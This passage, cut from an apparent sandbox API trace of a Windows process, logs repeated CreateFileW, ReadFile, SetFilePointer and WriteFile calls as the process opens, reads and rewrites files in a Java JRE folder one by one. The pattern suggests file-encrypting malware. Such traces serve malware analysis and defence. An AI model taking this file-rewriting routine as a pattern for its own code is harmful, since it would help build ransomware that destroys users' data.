lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0118.869] WriteFile (in: hFile=0x1dc, lpBuffer=0x2897978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.870] CloseHandle (hObject=0x1dc) returned 1 [0118.870] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\rmid.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmid.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.871] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.871] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3da8 [0118.871] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.871] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.871] ReleaseMutex (hMutex=0x168) returned 1 [0118.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmid.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0118.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rmid.exe", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rmid.exe", lpUsedDefaultChar=0x0) returned 8 [0118.871] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea7988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.902] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2da8 [0118.902] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.910] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2da8 [0118.910] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.911] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0118.911] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.912] CloseHandle (hObject=0x1dc) returned 1 [0118.912] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.913] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.913] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2a2dd [0118.913] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.913] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.913] ReleaseMutex (hMutex=0x168) returned 1 [0118.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="alt-rt.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="alt-rt.jar", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alt-rt.jar", lpUsedDefaultChar=0x0) returned 10 [0118.913] ReadFile (in: hFile=0x1dc, lpBuffer=0x2897978, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2897978*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.927] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x292dd [0118.927] ReadFile (in: hFile=0x1dc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.936] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x292dd [0118.936] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.936] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0118.936] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.937] CloseHandle (hObject=0x1dc) returned 1 [0118.938] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0119.722] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0119.723] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xc48 [0119.723] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0119.723] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.723] ReleaseMutex (hMutex=0x168) returned 1 [0119.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sRGB.pf", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0119.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sRGB.pf", cchWideChar=7, lpMultiByteStr=0x1f7accc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sRGB.pf", lpUsedDefaultChar=0x0) returned 7 [0119.723] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867b58, nNumberOfBytesToRead=0xc48, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867b58*, lpNumberOfBytesRead=0x331f2bc*=0xc48, lpOverlapped=0x0) returned 1 [0119.727] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0119.728] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0x11d0, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x331f2d0*=0x11d0, lpOverlapped=0x0) returned 1 [0124.204] CloseHandle (hObject=0x1cc) returned 1 [0124.204] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0124.204] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0124.205] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xd51 [0124.205] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0124.205] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0124.205] ReleaseMutex (hMutex=0x168) returned 1 [0124.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_fr.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0124.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_fr.properties", cchWideChar=22, lpMultiByteStr=0x1f8867c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_fr.properties", lpUsedDefaultChar=0x0) returned 22 [0124.205] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea96b8, nNumberOfBytesToRead=0xd51, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea96b8*, lpNumberOfBytesRead=0x331f2bc*=0xd51, lpOverlapped=0x0) returned 1 [0124.213] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0124.213] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0x12d9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x331f2d0*=0x12d9, lpOverlapped=0x0) returned 1 [0124.213] CloseHandle (hObject=0x1cc) returned 1 [0124.214] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_tw.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0124.215] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0124.215] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xea8 [0124.215] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0124.215] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0124.215] ReleaseMutex (hMutex=0x168) returned 1 [0124.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_TW.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0124.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_TW.properties", cchWideChar=25, lpMultiByteStr=0x1f8fcfc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_zh_TW.properties", lpUsedDefaultChar=0x0) returned 25 [0124.216] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea96b8, nNumberOfBytesToRead=0xea8, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea96b8*, lpNumberOfBytesRead=0x331f2bc*=0xea8, lpOverlapped=0x0) returned 1 [0124.259] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0124.259] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x331f2d0*=0x1430, lpOverlapped=0x0) returned 1 [0128.131] CloseHandle (hObject=0x1cc) returned 1 [0128.131] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\sunec.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\sunec.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.133] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.133] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3e45 [0128.133] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.133] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.133] ReleaseMutex (hMutex=0x168) returned 1 [0128.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunec.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0128.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunec.jar", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunec.jar", lpUsedDefaultChar=0x0) returned 9 [0128.134] ReadFile (in: hFile=0x1cc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.136] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2e45 [0128.136] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e963d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.138] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2e45 [0128.138] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.139] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0128.139] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.139] CloseHandle (hObject=0x1cc) returned 1 [0128.140] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.142] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.142] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x12588 [0128.142] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.143] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.143] ReleaseMutex (hMutex=0x168) returned 1 [0128.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiBold.ttf", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0128.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiBold.ttf", cchWideChar=24, lpMultiByteStr=0x1f8fcfc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightDemiBold.ttf", lpUsedDefaultChar=0x0) returned 24 [0128.143] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0128.146] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x11588 [0128.146] ReadFile (in: hFile=0x1cc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.147] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x11588 [0128.148] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.148] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0128.148] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0128.148] CloseHandle (hObject=0x1cc) returned 1 [0128.149] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\i386\\jvm.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.151] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.152] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2ae [0128.152] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.152] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.153] ReleaseMutex (hMutex=0x168) returned 1 [0128.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.cfg", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0128.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.cfg", cchWideChar=7, lpMultiByteStr=0x1f7acb4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jvm.cfg", lpUsedDefaultChar=0x0) returned 7 [0128.153] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x2ae, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x331f2bc*=0x2ae, lpOverlapped=0x0) returned 1 [0128.155] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0128.155] WriteFile (in: hFile=0x1cc, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x836, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x331f2d0*=0x836, lpOverlapped=0x0) returned 1 [0128.155] CloseHandle (hObject=0x1cc) returned 1 [0128.156] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.160] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.160] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x99 [0128.161] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0128.161] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.161] ReleaseMutex (hMutex=0x168) returned 1 [0128.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0128.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_MoveNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x1f8fcfc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_MoveNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 25 [0128.161] ReadFile (in: hFile=0x1cc, lpBuffer=0x262f2f8, nNumberOfBytesToRead=0x99, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x262f2f8*, lpNumberOfBytesRead=0x331f2bc*=0x99, lpOverlapped=0x0) returned 1 [0128.163] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0128.163] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x621, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x621, lpOverlapped=0x0) returned 1 [0128.164] CloseHandle (hObject=0x1cc) returned 1 [0128.164] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jsse.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0128.166] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, 